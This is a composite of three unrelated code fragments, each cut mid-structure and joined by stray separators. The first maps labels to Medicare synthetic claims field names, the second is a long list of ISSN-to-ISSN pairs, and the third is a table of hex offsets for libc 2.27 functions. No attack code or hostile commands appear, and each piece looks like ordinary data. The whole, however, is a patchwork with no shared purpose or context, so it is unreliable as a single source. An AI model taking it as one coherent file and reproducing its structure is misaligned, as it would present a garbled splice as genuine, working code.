("'Line Coinsurance Amount 3'", "LINE_COINSRNC_AMT_3"),
("'Line Coinsurance Amount 4'", "LINE_COINSRNC_AMT_4"),
("'Line Coinsurance Amount 5'", "LINE_COINSRNC_AMT_5"),
("'Line Coinsurance Amount 6'", "LINE_COINSRNC_AMT_6"),
("'Line Coinsurance Amount 7'", "LINE_COINSRNC_AMT_7"),
("'Line Coinsurance Amount 8'", "LINE_COINSRNC_AMT_8"),
("'Line Coinsurance Amount 9'", "LINE_COINSRNC_AMT_9"),
("'Line Coinsurance Amount 10'", "LINE_COINSRNC_AMT_10"),
("'Line Coinsurance Amount 11'", "LINE_COINSRNC_AMT_11"),
("'Line Coinsurance Amount 12'", "LINE_COINSRNC_AMT_12"),
("'Line Coinsurance Amount 13'", "LINE_COINSRNC_AMT_13"),
("'Line Allowed Charge Amount 1'", "LINE_ALOWD_CHRG_AMT_1"),
("'Line Allowed Charge Amount 2'", "LINE_ALOWD_CHRG_AMT_2"),
("'Line Allowed Charge Amount 3'", "LINE_ALOWD_CHRG_AMT_3"),
("'Line Allowed Charge Amount 4'", "LINE_ALOWD_CHRG_AMT_4"),
("'Line Allowed Charge Amount 5'", "LINE_ALOWD_CHRG_AMT_5"),
("'Line Allowed Charge Amount 6'", "LINE_ALOWD_CHRG_AMT_6"),
("'Line Allowed Charge Amount 7'", "LINE_ALOWD_CHRG_AMT_7"),
("'Line Allowed Charge Amount 8'", "LINE_ALOWD_CHRG_AMT_8"),
("'Line Allowed Charge Amount 9'", "LINE_ALOWD_CHRG_AMT_9"),
("'Line Allowed Charge Amount 10'", "LINE_ALOWD_CHRG_AMT_10"),
("'Line Allowed Charge Amount 11'", "LINE_ALOWD_CHRG_AMT_11"),
("'Line Allowed Charge Amount 12'", "LINE_ALOWD_CHRG_AMT_12"),
("'Line Allowed Charge Amount 13'", "LINE_ALOWD_CHRG_AMT_13"),
# Inpatients
("'Claim Line Segment'", "SEGMENT"),
("'Claims start date'", "CLM_FROM_DT"),
("'Claims end date'", "CLM_THRU_DT"),
("'Claim Payment Amount'", "CLM_PMT_AMT"),
("'NCH Primary Payer Claim Paid Amount'", "NCH_PRMRY_PYR_CLM_PD_AMT"),
("'Inpatient admission date'", "CLM_ADMSN_DT"),
("'Claim Pass Thru Per Diem Amount'", "CLM_PASS_THRU_PER_DIEM_AMT"),
("'NCH Beneficiary Inpatient Deductible Amount'", "NCH_BENE_IP_DDCTBL_AMT"),
("'NCH Beneficiary Part A Coinsurance Liability Amount'", "NCH_BENE_PTA_COINSRNC_LBLTY_AM"),
("'NCH Beneficiary Blood Deductible Liability Amount'", "NCH_BENE_BLOOD_DDCTBL_LBLTY_AM"),
("'Claim Utilization Day Count'", "CLM_UTLZTN_DAY_CNT"),
("'Inpatient discharged date'", "NCH_BENE_DSCHRG_DT"),
# Outpatients
("'Claim Line Segment'", "SEGMENT"),
("'Claims start date'", "CLM_FROM_DT"),
("'Claims end date'", "CLM_THRU_DT"),
("'Claim Payment Amount'", "CLM_PMT_AMT"),
("'NCH Primary Payer Claim Paid Amount'", "NCH_PRMRY_PYR_CLM_PD_AMT"),
("'NCH Beneficiary Blood Deductible Liability Amount'", "NCH_BENE_BLOOD_DDCTBL_LBLTY_AM"),
("'NCH Beneficiary Part B Deductible Amount'", "NCH_BENE_PTB_DDCTBL_AMT"),
("'NCH Beneficiary Part B Coinsurance Amount'", "NCH_BENE_PTB_COINSRNC_AMT"),
# Prescription
("'RX Service Date'", "SRVC_DT"),
("'Quantity Dispensed'", "QTY_DSPNSD_NUM"),
("'Days Supply'", "DAYS_SUPLY_NUM"),
("'Patient Pay Amount'", "PTNT_PAY_AMT"),
("'Gross Drug Cost'", "TOT_RX_CST_AMT"),
]
# Edit logical_attributes to adapt to new set of logical attributes.
logical_attributes = [
# Beneficiaries
("'Chronic Condition: Alzheimer or related disorders or senile'", "SP_ALZHDMTA"),
("'Chronic Condition: Heart Failure'", "SP_CHF"),
("'Chronic Condition: Chronic Kidney Disease'", "SP_CHRNKIDN"),
("'Chronic Condition: Cancer'", "SP_CNCR"),
("'Chronic Condition: Chronic Obstructive Pulmonary Disease'", "SP_COPD"),
("'Chronic Condition: Depression'", "SP_DEPRESSN"),
("'Chronic Condition: Diabetes'", "SP_DIABETES"),
("'Chronic Condition: Ischemic Heart Disease'", "SP_ISCHMCHT"),
("'Chronic Condition: Osteoporosis'", "SP_OSTEOPRS"),
("'Chronic Condition: Rheumatoid Arthritis or Osteoarthritis (RA/OA)'", "SP_RA_OA"),
("'Chronic Condition: Stroke/transient Ischemic Attack'", "SP_STRKETIA"),
]
# Edit textual_attributes to adapt to new set of textual attributes.
textual_attributes = [
# Beneficiaries
#("'End stage renal disease Indicator'", "BENE_ESRD_IND"),
("'Beneficiary Code'", "DESYNPUF_ID"),
("'State Code'", "SP_STATE_CODE"),
("'County Code'", "BENE_COUNTY_CD"),
# Carriers
("'Beneficiary Code'", "DESYNPUF_ID"),
("'Claim ID'", "CLM_ID"),
("'Claim Diagnosis Code 1'", "ICD9_DGNS_CD_1"),
("'Claim Diagnosis Code 2'", "ICD9_DGNS_CD_2"),
("'Claim Diagnosis Code 3'", "ICD9_DGNS_CD_3"),
("'Claim Diagnosis Code 4'", "ICD9_DGNS_CD_4"),
("'Claim Diagnosis Code 5'", "ICD9_DGNS_CD_5"),
("'Claim Diagnosis Code 6'", "ICD9_DGNS_CD_6"),
("'Claim Diagnosis Code 7'", "ICD9_DGNS_CD_7"),
("'Claim Diagnosis Code 8'", "ICD9_DGNS_CD_8"),
("'Provider Physician - National Provider Identifier Number 1'", "PRF_PHYSN_NPI_1"),
("'Provider Physician - National Provider Identifier Number 2'", "PRF_PHYSN_NPI_2"),
("'Provider Physician - National Provider Identifier Number 3'", "PRF_PHYSN_NPI_3"),
("'Provider Physician - National Provider Identifier Number 4'", "PRF_PHYSN_NPI_4"),
("'Provider Physician - National Provider Identifier Number 5'", "PRF_PHYSN_NPI_5"),
("'Provider Physician - National Provider Identifier Number 6'", "PRF_PHYSN_NPI_6"),
("'Provider Physician - National Provider Identifier Number 7'", "PRF_PHYSN_NPI_7"),
("'Provider Physician - National Provider Identifier Number 8'", "PRF_PHYSN_NPI_8"),
("'Provider Physician - National Provider Identifier Number 9'", "PRF_PHYSN_NPI_9"),
("'Provider Physician - National Provider Identifier Number 10'", "PRF_PHYSN_NPI_10"),
("'Provider Physician - National Provider Identifier Number 11'", "PRF_PHYSN_NPI_11"),
("'Provider Physician - National Provider Identifier Number 12'", "PRF_PHYSN_NPI_12"),
("'Provider Physician - National Provider Identifier Number 13'", "PRF_PHYSN_NPI_13"),
("'Provider Institution Tax Number 1'", "TAX_NUM_1"),
("'Provider Institution Tax Number 2'", "TAX_NUM_2"),
("'Provider Institution Tax Number 3'", "TAX_NUM_3"),
("'Provider Institution Tax Number 4'", "TAX_NUM_4"),
("'Provider Institution Tax Number 5'", "TAX_NUM_5"),
("'Provider Institution Tax Number 6'", "TAX_NUM_6"),
("'Provider Institution Tax Number 7'", "TAX_NUM_7"),
("'Provider Institution Tax Number 8'", "TAX_NUM_8"),
("'Provider Institution Tax Number 9'", "TAX_NUM_9"),
("'Provider Institution Tax Number 10'", "TAX_NUM_10"),
("'Provider Institution Tax Number 11'", "TAX_NUM_11"),
("'Provider Institution Tax Number 12'", "TAX_NUM_12"),
("'Provider Institution Tax Number 13'", "TAX_NUM_13"),
("'Line HCFA Common Procedure Coding System 1'", "HCPCS_CD_1"),
("'Line HCFA Common Procedure Coding System 2'", "HCPCS_CD_2"),
("'Line HCFA Common Procedure Coding System 3'", "HCPCS_CD_3"),
("'Line HCFA Common Procedure Coding System 4'", "HCPCS_CD_4"),
("'Line HCFA Common Procedure Coding System 5'", "HCPCS_CD_5"),
("'Line HCFA Common Procedure Coding System 6'", "HCPCS_CD_6"),
("'Line HCFA Common Procedure Coding System 7'", "HCPCS_CD_7"),
("'Line HCFA Common Procedure Coding System 8'", "HCPCS_CD_8"),
("'Line HCFA Common Procedure Coding System 9'", "HCPCS_CD_9"),
("'Line HCFA Common Procedure Coding System 10'", "HCPCS_CD_10"),
("'Line HCFA Common Procedure Coding System 11'", "HCPCS_CD_11"),
("'Line HCFA Common Procedure Coding System 12'", "HCPCS_CD_12"),
("'Line HCFA Common Procedure Coding System 13'", "HCPCS_CD_13"),
("'Line Processing Indicator Code 1'", "LINE_PRCSG_IND_CD_1"),
("'Line Processing Indicator Code 2'", "LINE_PRCSG_IND_CD_2"),
("'Line Processing Indicator Code 3'", "LINE_PRCSG_IND_CD_3"),
("'Line Processing Indicator Code 4'", "LINE_PRCSG_IND_CD_4"),
("'Line Processing Indicator Code 5'", "LINE_PRCSG_IND_CD_5"),
("'Line Processing Indicator Code 6'", "LINE_PRCSG_IND_CD_6"),
("'Line Processing Indicator Code 7'", "LINE_PRCSG_IND_CD_7"),
("'Line Processing Indicator Code 8'", "LINE_PRCSG_IND_CD_8"),
| |
'2090-5769',
'1755-8743': '1755-8735',
'2211-9140': '2211-9132',
'2075-1354': '2070-0733',
'2165-3364': '2165-3356',
'1958-9190': '1634-2941',
'0025-6307': '0748-1756',
'2160-7001': '1071-121X',
'2052-4307': '0969-4900',
'2224-4662': '1565-9801',
'2160-8776': '2160-8741',
'1558-1195': '1049-3301',
'2168-202X': '2168-2011',
'2162-5824': '2162-5816',
'2233-9337': '2005-8039',
'1466-1810': '0267-3037',
'1793-6888': '0219-6336',
'1572-9346': '1381-298X',
'1867-7185': '1001-0521',
'2163-0070': '2168-1678',
'1875-9068': '1574-1699',
'2164-005X': '2163-9914',
'2328-5273': '2328-4633',
'2157-1740': '2157-1732',
'2278-7135': '2249-4863',
'1809-9246': '1413-3555',
'2187-5626': '0915-5287',
'2090-3081': '2090-3073',
'1985-2274': '1985-207X',
'2092-6448': '2093-2340',
'2090-9195': '2090-9187',
'2008-8469': '2008-4633',
'2322-3219': '2322-4436',
'2288-1778': '2288-176X',
'2251-9645': '2251-9637',
'2164-2656': '2164-2648',
'2162-2388': '2162-237X',
'2287-903X': '2287-8882',
'2080-4873': '2080-4806',
'1472-1481': '1355-5146',
'1746-0980': '1746-0972',
'1793-6640': '0217-9849',
'1557-3168': '1089-3504',
'2193-3405': '0033-8230',
'2162-9986': '2162-9978',
'2212-1455': '2212-1447',
'2162-8149': '2162-8130',
'1687-0425': '0161-1712',
'1469-9710': '0142-6397',
'2160-5858': '2160-5831',
'1873-7153': '0016-2361',
'1573-8345': '0010-5082',
'1569-9978': '0378-4177',
'2157-5452': '1559-3940',
'2320-4753': '2278-9626',
'2152-0712': '2152-0704',
'2069-8534': '2069-8267',
'2212-8298': '2212-828X',
'1927-7008': '1927-6990',
'1477-0326': '0267-6583',
'1678-4626': '0101-7330',
'2169-8961': '2169-8953',
'2283-3420': '2282-8419',
'1532-5318': '1072-0162',
'1573-0468': '0922-680X',
'2329-0862': '2329-0870',
'2163-1867': '2163-1840',
'1741-1130': '1741-1122',
'2299-0046': '1642-395X',
'2084-4298': '1730-7503',
'2213-8862': '1991-7902',
'1756-0802': '1756-0799',
'2228-7531': '2228-7523',
'2251-7308': '2228-5881',
'2229-7685': '0259-1162',
'2188-8426': '1346-8650',
'2008-0700': '1735-4668',
'2008-4234': '2008-2258',
'2192-5690': '2192-5682',
'2251-9599': '2251-953X',
'2345-6418': '2345-6485',
'1309-0380': '1309-0399',
'2093-3797': '2092-9862',
'2228-7876': '1735-7780',
'2251-7472': '2251-7464',
'2251-8819': '2251-8363',
'2050-1250': '2050-1242',
'2278-4306': '2278-330X',
'2250-1002': '2231-0762',
'1744-5531': '1744-5523',
'2252-0058': '2008-384X',
'1537-2642': '0889-3365',
'1469-9885': '1357-6275',
'2213-8595': '2213-8587',
'2224-6509': '2224-3992',
'2325-1298': '2325-128X',
'1873-2100': '0306-4549',
'1573-8353': '0009-3122',
'1475-3073': '1474-7464',
'1303-6130': '1300-0527',
'1745-8099': '1745-8080',
'1741-3087': '0305-7356',
'1934-7405': '1934-7391',
'1573-7020': '1381-4338',
'1953-8030': '0245-7466',
'1662-596X': '1662-5986',
'2324-8068': '2324-805X',
'1909-9991': '1909-9762',
'1572-9451': '1018-4864',
'1540-6040': '1535-6841',
'1710-1131': '0008-4506',
'2046-0260': '2046-0252',
'2211-6931': '2211-6923',
'2049-9469': '2049-9450',
'2049-9442': '2049-9434',
'2163-5803': '2163-5781',
'1758-1958': '1758-194X',
'1878-5514': '1468-6996',
'2027-3444': '0120-4319',
'2156-4647': '2156-4639',
'1469-6711': '1354-9839',
'2212-8808': '2212-8794',
'2330-460X': '2330-4596',
'2231-4016': '2231-4008',
'2047-1890': '2047-1882',
'1477-0296': '0309-1333',
'1935-4940': '1935-4932',
'2067-7855': '1224-5593',
'2165-7416': '2165-7408',
'1945-0710': '0360-7275',
'2071-2936': '2071-2928',
'1573-1502': '0924-6460',
'2331-2432': '2331-2424',
'1863-2513': '1863-2505',
'2177-8833': '1983-8409',
'1984-7726': '0101-3335',
'1938-6737': '1938-5862',
'2169-0502': '2169-0499',
'1988-8287': '1696-7240',
'2305-5847': '2305-5839',
'1865-0481': '1865-0473',
'2326-6074': '2326-6066',
'1993-6095': '1815-9346',
'2325-8306': '2325-8292',
'2161-1238': '2161-122X',
'1090-7009': '0162-5748',
'2161-7333': '2161-7325',
'1878-0040': '1755-4586',
'1572-9516': '0015-9018',
'1436-5081': '0026-9255',
'1434-6052': '1434-6044',
'1543-2793': '0888-4781',
'1569-9773': '1568-1475',
'1432-0924': '0178-7675',
'1745-1027': '1057-0314',
'2166-5052': '2166-5044',
'2281-7565': '2281-5872',
'1869-5469': '1869-5450',
'2161-8089': '2161-8070',
'2227-4561': '2227-457X',
'2169-0707': '2169-0693',
'2190-8249': '1867-299X',
'2325-0712': '2325-0704',
'1572-9869': '0928-1371',
'1759-8281': '1759-8273',
'2232-111X': '1985-2533',
'1461-7080': '1461-4456',
'2190-9164': '2195-5840',
'1752-1289': '1752-1270',
'1809-4392': '0044-5967',
'2195-4720': '0933-4807',
'1827-1707': '0394-3410',
'1521-3749': '0044-2313',
'1741-3117': '1473-3250',
'1552-4590': '1069-0727',
'1873-958X': '1873-9598',
'1532-7868': '1092-6488',
'2046-2174': '2046-2166',
'1947-2943': '1947-2935',
'2325-1549': '2325-1557',
'1467-9671': '1361-1682',
'2151-7509': '2194-6299',
'1877-6116': '2210-6871',
'1552-8340': '0042-0859',
'1753-8971': '1753-8963',
'1665-9686': '1870-249X',
'1545-8504': '1545-8490',
'2157-9636': '2156-7794',
'2033-6772': '2033-6403',
'1558-4305': '0891-7736',
'1793-8317': '1793-8309',
'2160-8806': '2160-8792',
'2165-8110': '2165-8102',
'2165-3380': '2165-3372',
'2193-8660': '2193-8652',
'1936-9298': '1936-928X',
'2213-0772': '2213-0764',
'2228-5059': '2008-8868',
'1573-4803': '0022-2461',
'2079-9799': '2079-9780',
'2161-7627': '2161-7597',
'2167-6984': '2167-6968',
'2288-6796': '2288-6575',
'2213-7173': '2213-7165',
'1879-2707': '0022-1694',
'1756-1760': '1756-1752',
'1872-7441': '0165-232X',
'2090-7958': '2090-7893',
'1560-683X': '2078-1865',
'1464-5211': '0020-739X',
'1465-7341': '8756-6222',
'2164-3210': '2164-3202',
'2090-5351': '2090-5343',
'1492-1367': '0316-0041',
'2047-7481': '2047-7473',
'2330-1538': '2330-152X',
'1904-0016': '1901-2276',
'2168-0248': '2168-023X',
'1879-3622': '1751-7214',
'2291-2797': '2291-2789',
'2326-5205': '2326-5191',
'1741-2927': '1476-718X',
'2011-7922': '2011-2084',
'1873-2240': '0168-1923',
'1879-9272': '1879-9264',
'2326-831X': '2326-8298',
'1875-4805': '1875-4791',
'2168-1597': '2168-1589',
'1573-1472': '0006-8314',
'1867-8548': '1867-1381',
'2212-4306': '2212-4292',
'1552-4205': '0007-6503',
'2049-5994': '2049-5986',
'1949-2901': '1942-8200',
'2347-3517': '2347-3584',
'1758-714X': '0965-4283',
'1897-4295': '1734-9338',
'0976-3260': '0972-7531',
'2212-4276': '2212-4268',
'1347-7501': '1340-3516',
'2008-2177': '1680-6433',
'2008-2207': '2008-3009',
'1735-9287': '1735-8639',
'2090-6412': '2090-6404',
'2213-3666': '0975-962X',
'2090-6439': '2090-6420',
'2090-665X': '2090-6641',
'2194-7627': '2194-7619',
'1308-8742': '1308-8734',
'2279-042X': '2319-9644',
'0975-1904': '0974-7052',
'2278-0203': '2278-1897',
'2226-7190': '2303-9027',
'2233-6257': '2233-6249',
'2333-0376': '2333-0384',
'2051-2201': '1355-8250',
'1366-5812': '0010-7514',
'2051-8161': '2051-8153',
'2213-2414': '2213-2406',
'1572-8838': '0021-891X',
'2224-4778': '2224-476X',
'1521-0588': '0149-0400',
'2150-7708': '2150-7686',
'2093-985X': '2093-9868',
'2051-6355': '2051-6347',
'2314-4416': '2314-4408',
'2154-8641': '2154-8633',
'2330-0566': '2330-0558',
'1460-3616': '0263-2764',
'2228-5326': '2008-9295',
'2053-3705': '2053-3691',
'2296-6501': '2296-6498',
'2313-4607': '2304-8336',
'2093-6729': '1738-2262',
'1984-0063': '1984-0659',
'2049-937X': '2049-9361',
'2050-6414': '2050-6406',
'2051-0144': '2051-0136',
'2314-7156': '2314-8861',
'2048-9153': '2048-9145',
'1792-7463': '1108-7471',
'2287-1292': '2287-1012',
'2288-2413': '2288-2405',
'1741-5020': '0963-6048',
'2296-5262': '2296-5270',
'2050-2885': '2050-2877',
'2251-9149': '2251-9130',
'1943-2747': '1065-8025',
'1557-9948': '0278-0046',
'0973-8746': '0973-340X',
'1931-390X': '1931-3896',
'1837-6746': '1837-6738',
'2212-5566': '2212-5558',
'1546-5012': '1546-2234',
'1927-0534': '1927-0526',
'1927-0895': '1927-0887',
'2333-4711': '2333-4703',
'2090-2077': '2090-2069',
'2163-3134': '1557-234X',
'2227-0426': '0253-8253',
'2288-5943': '2288-5919',
'2322-3618': '2008-8140',
'1541-4620': '1541-4612',
'1432-0894': '0930-7575',
'1913-9055': '1913-9047',
'2169-5032': '1555-3434',
'1746-1987': '1746-1979',
'1558-2167': '1558-2159',
'1897-4317': '1895-5770',
'2008-2401': '2008-2398',
'1942-2970': '1942-2962',
'2093-4939': '2005-940X',
'2277-6559': '2249-4308',
'2228-6721': '2008-9783',
'2162-4461': '2162-4453',
'2296-1887': '2296-1895',
'1939-9340': '0018-9235',
'1752-0118': '0265-9883',
'1460-6976': '0001-8732',
'0974-0252': '0019-5502',
'1878-1535': '1631-0705',
'1465-3885': '0265-0533',
'1434-4599': '1553-2739',
'1557-2072': '1557-2064',
'1879-1859': '0926-9851',
'1744-263X': '1744-2621',
'2320-1789': '2320-1770',
'1744-4217': '0013-838X',
'1744-4233': '1382-5577',
'1528-9036': '0021-8936',
'1555-1423': '1555-1415',
'1469-4395': '1355-770X',
'1548-9574': '0260-3594',
'1944-7078': '1530-9827',
'1528-9044': '1043-7398',
'1528-8919': '0742-4795',
'1551-6989': '1550-624X',
'1528-8978': '0094-9930',
'1528-8986': '0199-6231',
'1528-8900': '0889-504X',
'1750-0133': '1355-5502',
'1468-0122': '0264-3944',
'1947-2501': '1947-2498',
'1755-7550': '1364-5145',
'2168-0418': '2168-0396',
'2045-0931': '2045-0923',
'1873-4081': '1369-8001',
'2327-3801': '2327-3798',
'1532-7973': '0835-1813',
'2165-7432': '2165-7424',
'2291-6466': '2291-6458',
'1617-4917': '1617-4909',
'2196-8837': '2197-3792',
'2049-548X': '2049-5471',
'2150-1300': '2150-1297',
'2165-1442': '2165-1434',
'1474-774X': '1474-7731',
'2326-473X': '2326-4705',
'1873-7285': '0997-7538',
'2164-5396': '2164-5388',
'2160-8091': '0008-0845',
'1875-676X': '1573-4129',
'1940-2325': '0091-5521',
'2156-8111': '2156-8103',
'1541-3101': '0164-212X',
'2216-0280': '0120-5307',
'2151-2299': '1614-0001',
'2047-3877': '2047-3869',
'2193-3685': '2193-3677',
'2168-2305': '2168-2291',
'1607-887X': '1026-0226',
'2325-0992': '2325-0984',
'2052-4129': '2052-4110',
'1839-3942': '0312-8008',
'1557-0878': '1098-2140',
'1735-9392': '1735-8949',
'1878-1217': '1359-6349',
'1996-8450': '0038-271X',
'2345-3729': '1735-0344',
'2008-6490': '2008-6482',
'2228-7949': '2228-7930',
'0975-5616': '0975-0770',
'2251-872X': '2251-8711',
'2211-5374': '2211-5366',
'2329-4523': '2329-4515',
'2161-7198': '2161-718X',
'2332-2225': '2332-2217',
'1938-9809': '1556-763X',
'2212-1684': '1875-9637',
'1469-4360': '0266-4666',
'2051-3909': '2051-3895',
'2186-3342': '2186-6953',
'1879-3592': '1383-5718',
'1388-2139': '1383-5742',
'2381-3121': '0162-6434',
'2040-4271': '2040-4263',
'2329-8464': '2329-8456',
'1943-7862': '0733-9364',
'2191-2491': '2191-2483',
'2052-5656': '2052-5648',
'2300-5653': '2299-2634',
'2214-5532': '2214-5524',
'2162-2167': '2162-2159',
'1573-1642': '1083-8155',
'2161-7414': '2161-7406',
'2330-2488': '2331-5024',
'2154-8684': '2154-8676',
'2329-3713': '2329-3691',
'1873-3263': '0959-4752',
'1567-2344': '0889-3675',
'1940-9206': '1524-0657',
'1883-2148': '1880-4276',
'2008-4692': '2008-4684',
'2191-7485': '2192-001X',
'2161-6752': '2161-6728',
'1552-6585': '1538-5132',
'1573-0840': '0921-030X',
'2211-6109': '2211-6095',
'2326-5531': '2326-5523',
'1758-7239': '1359-0790',
'1925-4059': '1925-4040',
'1941-1359': '1941-1340',
'1925-4075': '1925-4067',
'1874-4621': '1874-463X',
'2067-2284': '1843-6587',
'1469-9265': '1356-3475',
'1757-188X': '1757-1871',
'2329-4248': '2329-423X',
'1528-9796': '1552-8014',
'1552-6593': '0885-4122',
'2165-0020': '2165-0012',
'2169-6594': '0047-0813',
'1893-4641': '1893-4633',
'2212-554X': '2212-5531',
'2053-4876': '2053-4868',
'1558-2183': '1045-9219',
'1940-7661': '1940-767X',
'2193-5815': '2193-5807',
'2053-714X': '2095-5138',
'2314-4874': '2314-4866',
'1521-4001': '0044-2267',
'1548-0569': '0272-8397',
'2153-5477': '2153-5434',
'1945-7685': '1945-7669',
'1996-2088': '0065-1346',
'1753-1063': '1753-1055',
'1477-2728': '1043-9463',
'2325-1263': '2325-1255',
'1405-9274': '1607-050X',
'1862-6270': '1862-6254',
'1941-4153': '1941-4145',
'1940-4387': '1045-988X',
'2083-5728': '1232-9886',
'2167-647X': '2167-6461',
'1862-5215': '1434-663X',
'2224-2880': '1109-2769',
'1948-7169': '1557-0614',
'2161-4695': '2161-4687',
'1556-6048': '1556-603X',
'1879-2464': '0301-679X',
'1873-1236': '0966-6923',
'1873-3999': '0094-114X',
'2046-5815': '2046-5807',
'1433-7479': '1432-7643',
'2314-5714': '2314-5706',
'1945-5534': '0067-270X',
'1873-2984': '0364-5916',
'1945-2837': '1945-2829',
'2326-2621': '2326-263X',
'1872-7409': '0950-7051',
'1755-0491': '1755-0483',
'2168-0922': '2168-0906',
'2325-2189': '2325-2170',
'1090-2686': '0278-4165',
'1873-6025': '0950-5849',
'1432-2064': '0178-8051',
'1558-2558': '1089-7798',
'2155-8264': '2155-8256',
'2092-7673': '1598-5032',
'2314-6516': '2356-7538',
'1873-5606': '1359-4311',
'2330-0337': '2162-643X',
'1755-635X': '1755-6341',
'2287-2388': '2287-237X',
'1927-1220': '1927-1212',
'2226-4523': '2226-4531',
'1793-690X': '0219-6913',
'2090-2778': '2090-276X',
'2330-314X': '2330-3131',
'2314-789X': '2356-6787',
'1662-4505': '1662-2685',
'1986-5961': '0350-199X',
'1755-3547': '1755-3539',
'2042-8367': '1757-0980',
'2213-2961': '2095-2546',
'2273-421X': '2258-8094',
'1588-2756': '1585-8553',
'2163-2332': '2163-2324',
'2036-7465': '2036-7457',
'2329-0390': '2329-0382',
'2156-5295': '2156-5287',
'2348-926X': '2348-0548',
'1747-5767': '1747-5759',
'1752-248X': '1752-2471',
'2040-5804': '2040-5790',
'1468-0025': '0266-7177',
'1758-681X': '1758-6801',
'1365-2206': '1356-7500',
'1574-0218': '1574-020X',
'1349-6336': '0914-9244',
'1877-8879': '1877-8860',
'1533-8665': '0195-6086',
'2214-5753': '2214-5745',
'2352-0787': '2352-0779',
'1883-1737': '1882-6954',
'2169-9690': '2169-9682',
'2278-0513': '2278-1668',
'1612-7501': '1610-241X',
'1745-1035': '1051-0974',
'1552-7395': '0899-7640',
'1874-1746': '1874-1738',
'2296-4495': '0037-8615',
'1469-8110': '1351-3249',
'2288-3657': '2288-3649',
'2008-4161': '2008-3645',
'2228-7442': '2008-126X',
'2186-361X': '2186-3644',
'2194-7643': '2194-7635',
'2193-651X': '2193-8237',
'2193-6544': '2193-8261',
'2193-6382': '2193-8229',
'2193-6528': '2193-8245',
'1530-9312': '0891-2017',
'2345-461X': '2345-4644',
'2044-4761': '2044-4753',
'2039-2117': '2039-9340',
'1558-2205': '1051-8215',
'2214-0883': '2095-1779',
'1554-4788': '1554-477X',
'2326-4497': '2326-4489',
'2330-1643': '2330-1635',
'1863-0669': '1863-0650',
'1945-0680': '1945-0672',
'2168-4804': '2168-4790',
'2168-183X': '2168-1821',
'1476-3508': '0889-311X',
'1927-128X': '1927-1271',
'2373-0196': '2373-0188',
'1477-9803': '1053-1858',
'1758-7077': '0264-4401',
'2090-2379': '1110-5704',
'1307-9948': '1304-2947',
'2324-8041': '2324-8033',
'2215-3489': '0252-9521',
'1727-9380': '1022-0119',
'2155-2509': '2155-2487',
'1687-1499': '1687-1472',
'1572-9265': '1017-1398',
'2152-7393': '2152-7385',
'2210-6510': '2210-6502',
'2279-0780': '2319-2003',
'2191-0243': '0334-8938',
'1521-3919': '1022-1344',
'1938-5307': '1092-6194',
'1479-277X': '1046-3283',
'2162-1535': '0275-3987',
'1942-6593': '0042-0905',
'2162-142X': '2162-139X',
'2215-0374': '2215-0366',
'1755-1196': '1477-1756',
'1470-1545': '0272-2631',
'2158-6578': '2158-656X',
'2040-512X': '2040-5111',
'2095-4697': '2095-4689',
'1468-3156': '1354-4187',
'1923-2950': '1923-2942',
'1861-9959': '1610-1928',
'1569-982X': '1384-6647',
'2152-0801': '2152-0798',
'2314-7938': '2356-6833',
'2331-379X': '1555-2284',
'2214-1413': '2214-1405',
'1573-1634': '0169-3913',
'1559-8985': '1070-4698',
'1793-7132': '1016-2372',
'2168-2232': '2168-2216',
'1533-4015': '1082-9784',
'2045-2713': '1466-6529',
'2168-3611': '2168-3603',
'1573-8701': '1569-1721',
'1460-2067': '0010-4620',
'1532-8627': '1522-2942',
'2162-6553': '0896-2960',
'2010-1406': '2010-1392',
'1874-6047': '0423-2607',
'1534-6250': '1523-3820',
'2329-5805': '0076-9266',
'1615-1488': '1615-147X',
'2328-4854': '2328-4846',
'2169-2467': '2169-2459',
'2307-5023': '2352-7536',
'1868-422X': '1868-4238',
'2320-7078': '2349-6800',
'1937-0245': '1936-7244',
'2090-9098': '1110-7782',
'1542-5185': '1542-5177',
'1435-1528': '0035-4511',
'1563-5104': '0308-1079',
'1545-1577': '1094-2939',
'2281-695X': '0026-1424',
'1469-5782': '0964-5292',
'2156-7026': '2156-7018',
'2157-9644': '2153-2516',
'2164-313X': '2164-3121',
'1793-642X': '0129-6264',
'2331-2734': '2331-2726',
'1361-6641': '0268-1242',
'2372-3556': '2372-3548',
'1520-5703': '0161-4940',
'2232-0245': '2232-0253',
'1755-2427': '1755-2419',
'1471-6909': '0954-2892',
'2322-1674': '2322-1488',
'2322-4835': '2322-2476',
'2049-4645': '2049-4637',
'2090-6595': '2090-6587',
'2090-6617': '2090-6609',
'2322-3561': '2322-2220',
'2288-1956': '1598-9100',
'1308-8521': '1300-0705',
'2252-0724': '2228-7914',
'2356-6124': '2356-7759',
'2188-8361': '1344-1272',
'2288-6761': '2288-6478',
'2282-0930': '2282-2305',
'2164-5558': '2164-5531',
'1925-962X': '1925-9611',
'1470-840X': '1470-8396',
'1946-4673': '1946-4681',
'2329-4310': '2329-4302',
'1876-763X': | |
(0x20cbc30, 0, 'wcsncasecmp', 'libc_2_27'),
(0x20cbca0, 0, '__wcscasecmp_l', 'libc_2_27'),
(0x20cbca0, 0, 'wcscasecmp_l', 'libc_2_27'),
(0x20cbd00, 0, '__wcsncasecmp_l', 'libc_2_27'),
(0x20cbd00, 0, 'wcsncasecmp_l', 'libc_2_27'),
(0x20cc650, 0, '__isoc99_wscanf', 'libc_2_27'),
(0x20cc830, 0, '__isoc99_vwscanf', 'libc_2_27'),
(0x20cc970, 0, '__isoc99_fwscanf', 'libc_2_27'),
(0x20ccb40, 0, '__isoc99_vfwscanf', 'libc_2_27'),
(0x20ccc70, 0, '__isoc99_swscanf', 'libc_2_27'),
(0x20ccd30, 0, '__isoc99_vswscanf', 'libc_2_27'),
(0x20ccde0, 0, 'mbrtoc16', 'libc_2_27'),
(0x20cd090, 0, 'c16rtomb', 'libc_2_27'),
(0x20cff40, 0, 'wcstof128_l', 'libc_2_27'),
(0x20cff50, 0, '__wcstof128_internal', 'libc_2_27'),
(0x20cff60, 0, 'wcstof128', 'libc_2_27'),
(0x20d1270, 0, 'asctime_r', 'libc_2_27'),
(0x20d1350, 0, 'asctime', 'libc_2_27'),
(0x20d1440, 0, 'clock', 'libc_2_27'),
(0x20d14c0, 0, 'ctime', 'libc_2_27'),
(0x20d14e0, 0, 'ctime_r', 'libc_2_27'),
(0x20d1530, 0, 'difftime', 'libc_2_27'),
(0x20d1550, 0, '__gmtime_r', 'libc_2_27'),
(0x20d1550, 0, 'gmtime_r', 'libc_2_27'),
(0x20d1560, 0, 'gmtime', 'libc_2_27'),
(0x20d1570, 0, 'localtime_r', 'libc_2_27'),
(0x20d1580, 0, 'localtime', 'libc_2_27'),
